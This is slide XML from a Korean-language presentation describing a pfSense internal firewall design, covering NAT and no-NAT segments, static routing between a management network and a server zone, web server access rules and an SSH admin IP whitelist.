            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 59952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FFFFFF">
                  <a:alpha val="10000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
                <a:srgbClr val="F97316">
                  <a:alpha val="15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94" name="Image 5" descr="preencoded.png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8500811" y="2201511"/>
              <a:ext cx="189098" cy="189098"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Text 87"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8900770" y="2076603"/>
              <a:ext cx="514807" cy="277063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15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</a:rPr>
                <a:t>NAT</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Text 88"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8900770" y="2352752"/>
              <a:ext cx="543154" cy="152705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sz="900">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="80000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>주소 변환</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/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8405165" y="2742855"/>
              <a:ext cx="3133649" cy="2263540"/>
              <a:chOff x="4530852" y="2212705"/>
              <a:chExt cx="3133649" cy="2287818"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Shape 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4530852" y="2212705"/>
                <a:ext cx="3133649" cy="784291"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18741"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0F172A">
                  <a:alpha val="3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6" name="Text 14"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4845405" y="2552862"/>
                <a:ext cx="2557881" cy="37960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10.0.0.0/24 ↔ 172.16.0.0/24</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="l">
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr 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172.16.0.0/24 ↔ OpenVPN(10.8.0.0/24)</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Shape 15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4530852" y="3073599"/>
                <a:ext cx="3133649" cy="609905"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18741"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0F172A">
                  <a:alpha val="3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8" name="Text 16"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4863694" y="3414670"/>
                <a:ext cx="1644091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172.16.0.0/24 → WAN</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Shape 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4530852" y="3762247"/>
                <a:ext cx="3133649" cy="738276"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18741"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0F172A">
                  <a:alpha val="3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0" name="Text 18"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4816145" y="4103319"/>
                <a:ext cx="1912772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불필요한 주소 변환</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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(NAT)</a:t>
                </a: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을 제거하여 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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End-to-End </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                    <a:solidFill>
                      <a:srgbClr val="94A3B8"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>가시성 확보</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Text 50"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4845406" y="2316950"/>
                <a:ext cx="1156716" cy="22557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en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>NO-NAT </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>적용 구간</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="54" name="Text 51"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4863694" y="3178756"/>
                <a:ext cx="1644091" cy="2103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en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>Masquerading </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>적용 구간</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Text 52"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4816145" y="3867404"/>
                <a:ext cx="1004011" cy="2103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anchor="t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="l">
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>설계 목적</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="97" name="Image 6" descr="preencoded.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId4">
                <a:alphaModFix amt="80000"/>
              </a:blip>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4629379" y="3209049"/>
                <a:ext cx="125730" cy="134857"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="98" name="Image 7" descr="preencoded.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId5">
                <a:alphaModFix amt="80000"/>
              </a:blip>
              <a:srcRect l="-1910" r="-1910"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4628419" y="2343170"/>
                <a:ext cx="146852" cy="125732"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="99" name="Image 8" descr="preencoded.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId6">
                <a:alphaModFix amt="80000"/>
              </a:blip>
              <a:srcRect l="-130" r="-130"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4630797" y="3899177"/>
                <a:ext cx="94549" cy="125732"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204912" y="4852083"/>
            <a:ext cx="3534156" cy="1435023"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1744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8" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8214056" y="4852083"/>
            <a:ext cx="3514954" cy="3840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9" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8214056" y="5445233"/>
            <a:ext cx="3514954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0" name="Shape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8405166" y="4998767"/>
            <a:ext cx="381305" cy="381305"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 59952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  <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B82F6">
                <a:alpha val="15000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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21" name="Image 1" descr="preencoded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8509407" y="5103923"/>
            <a:ext cx="171907" cy="171907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Text 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899856" y="4970421"/>
            <a:ext cx="886054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Routing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Text 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899856" y="5246570"/>
            <a:ext cx="829361" cy="1527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900">
                <a:solidFill>
                  <a:srgbClr val="93C5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>경로 제어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8374687" y="5506119"/>
            <a:ext cx="3133649" cy="677200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741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0" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8707528" y="5799898"/>
            <a:ext cx="2707232" cy="30831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서버존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(10.10.0.0/24)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은 반드시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pfSense-2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를 거치도록 정적 라우팅 설정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8707528" y="5596694"/>
            <a:ext cx="1318565" cy="18115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정적 라우트 설정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect l="-1910" r="-1910"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8478928" y="5628986"/>
            <a:ext cx="133502" cy="9845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04323" y="1882213"/>
            <a:ext cx="7065207" cy="2855201"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8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9"/>
          <a:srcRect l="950" t="36440" b="23060"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="653186" y="1933955"/>
            <a:ext cx="6977482" cy="275996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04323" y="4804161"/>
            <a:ext cx="7065207" cy="1529888"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25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10"/>
          <a:srcRect l="1360" t="33510" r="1530" b="11010"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="653186" y="4852083"/>
            <a:ext cx="6977482" cy="14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571500" y="838505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pfSense-2 : Internal Segmentation Firewall (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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서비스 보호 구간</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
            <a:ext cx="571500" cy="38405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="323698"/>
            <a:ext cx="2924251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pfSense-2의 역할</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3703320"/>
            <a:ext cx="11041380" cy="2773374"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 302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0" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="4390212"/>
            <a:ext cx="4368820" cy="5643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pfSense-2 WAN: 172.16.0.200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pfSense-2 LAN: 10.10.0.1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 사용자라도 서버망 접근은 무조건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pfSense-2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정책 통과 필요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="5619223"/>
            <a:ext cx="4368820" cy="5643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서버망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(10.10.0.0/24)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은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 pfSense-2 → pfSense-1 → AWS /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내부망 경로로 이동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불필요한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NAT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제거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,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명확한 경로 기반 통신</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7558587" y="4355371"/>
            <a:ext cx="3350870" cy="84029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10.10.0.100 (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웹 서버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→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 및 허용된 구간에서 접근 가능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10.10.0.102 (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보안 웹 서버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→ 172.16.0.0/24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에서만 접근 허용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외부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/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타부서 접근 원천 차단</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7538098" y="5619903"/>
            <a:ext cx="3350870" cy="60112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SSH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접근 허용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IP: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  172.16.0.17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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  172.16.0.18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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관리자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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화이트리스트 방식 적용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="4118678"/>
            <a:ext cx="3489178" cy="23917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 구간 방화벽 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a: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Internal Firewall)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="5348478"/>
            <a:ext cx="2147367" cy="23917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라우팅 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7558587" y="4083837"/>
            <a:ext cx="2211327" cy="23917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웹 서버 접근 통제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7538097" y="5348369"/>
            <a:ext cx="2901696" cy="23917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SSH </a:t>
            </a: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접근 통제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a: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관리자 전용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Image 0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739" y="4224852"/>
            <a:ext cx="280212" cy="264419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Image 1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18713" y="5454652"/>
            <a:ext cx="350266" cy="264419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-1280" r="-1280"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6749298" y="4190010"/>
            <a:ext cx="268884" cy="264419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Image 3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754005" y="5454543"/>
            <a:ext cx="233031" cy="264419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1752905"/>
            <a:ext cx="11041380" cy="1752905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2268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3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="-40" b="-40"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933602" y="2104949"/>
            <a:ext cx="133502" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="2523744"/>
            <a:ext cx="4934102" cy="743407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172.16.0.0/24 : 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내부 관리망</a:t>
            </a:r>
          </a:p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10.10.0.0/24 : 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서버 존 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(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웹 서비스 영역</a:t>
            </a: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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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pfSense-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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는 내부망과 서버망을 분리하는 내부 방화벽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="2038198"/>
            <a:ext cx="1248156" cy="27706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배경 설정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23422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hape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="367133"/>
            <a:ext cx="761695" cy="57607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 793654"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE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 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="509779"/>
            <a:ext cx="5353812" cy="4956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lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr 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pfSense-2 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방화벽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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·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altLang="ko-KR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라우팅 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" b="1" kern="0" spc="-67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정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1037844"/>
            <a:ext cx="11177626" cy="2670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300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네트워크 흐름 제어 및 외부 서비스 연결 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620725" y="1524302"/>
            <a:ext cx="3379808" cy="2881970"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1744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Shape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630344" y="1532851"/>
            <a:ext cx="3361445" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A855F7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Shape 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8639963" y="2069665"/>
            <a:ext cx="3361445" cy="28388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Shape 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779636" y="1661993"/>
            <a:ext cx="375627" cy="365636"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 59952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  <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="A855F7">
                <a:alpha val="15000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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6" name="Image 9" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
